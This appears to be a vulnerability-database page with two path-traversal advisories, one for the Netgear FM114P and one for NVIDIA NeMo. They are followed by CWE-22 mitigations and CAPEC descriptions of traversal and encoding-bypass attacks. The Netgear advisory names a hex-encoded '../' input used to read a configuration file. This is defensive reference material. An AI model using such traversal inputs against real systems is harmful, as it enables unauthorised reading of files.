GHSA-F3JF-VG7F-63FC

Vulnerability from github – Published: 2022-04-29 01:28 – Updated: 2022-04-29 01:28
VLAI
Details

Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2003-1427"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2003-12-31T05:00:00Z",
    "severity": "MODERATE"
  },
  "details": "Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter.",
  "id": "GHSA-f3jf-vg7f-63fc",
  "modified": "2022-04-29T01:28:02Z",
  "published": "2022-04-29T01:28:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2003-1427"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/11279"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/311160"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/6807"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-F3M5-V6Q6-4C4H

Vulnerability from github – Published: 2024-10-15 06:30 – Updated: 2024-10-15 06:30
VLAI
Details

NVIDIA NeMo contains a vulnerability in SaveRestoreConnector where a user may cause a path traversal issue via an unsafe .tar file extraction. A successful exploit of this vulnerability may lead to code execution and data tampering.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-15T06:15:02Z",
    "severity": "MODERATE"
  },
  "details": "NVIDIA NeMo contains a vulnerability in SaveRestoreConnector where a user may cause a path traversal issue via an unsafe .tar file extraction. A successful exploit of this vulnerability may lead to code execution and data tampering.",
  "id": "GHSA-f3m5-v6q6-4c4h",
  "modified": "2024-10-15T06:30:32Z",
  "published": "2024-10-15T06:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0129"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5580"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-20.1
Implementation

Strategy: Input Validation

  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
  • Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
  • realpath() in C
  • getCanonicalPath() in Java
  • GetFullPath() in ASP.NET
  • realpath() or abs_path() in Perl
  • realpath() in PHP
Mitigation MIT-4
Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Mitigation MIT-21.1
Architecture and Design

Strategy: Enforcement by Conversion

  • When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
  • For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Mitigation MIT-22
Architecture and Design Operation

Strategy: Sandbox or Jail

  • Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
  • OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-34
Architecture and Design Operation

Strategy: Attack Surface Reduction

  • Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
  • This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
  • In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy.
Mitigation MIT-16
Operation Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

CAPEC-126: Path Traversal

An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \) and/or dots (.)) to reach desired directories or files.

CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic

This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-78: Using Escaped Slashes in Alternate Encoding

This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.

CAPEC-79: Using Slashes in Alternate Encoding

This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.